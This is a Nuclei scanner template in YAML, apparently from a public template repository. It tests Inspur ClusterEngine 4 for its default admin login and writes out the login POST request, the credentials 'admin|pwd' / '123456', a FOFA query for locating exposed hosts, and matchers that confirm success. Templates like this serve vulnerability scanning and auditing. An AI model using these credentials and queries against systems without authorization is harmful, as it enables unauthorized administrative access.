nuclei-templates/default-logins/others/inspur-clusterengine-defaul...

49 lines
1022 B
YAML

id: inspur-clusterengine-default-login
info:
name: Inspur Clusterengine 4 - Default Admin Login
author: ritikchaddha
severity: high
description: Inspur Clusterengine version 4 default admin login credentials were successful.
reference:
- https://blog.csdn.net/qq_36197704/article/details/115665793
metadata:
fofa-query: title="TSCEV4.0"
tags: default-login,inspur,clusterengine
requests:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
op=login&username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin|pwd
password:
- 123456
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"exitcode":0'
- type: word
part: header
words:
- "username=admin|pwd"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/07/04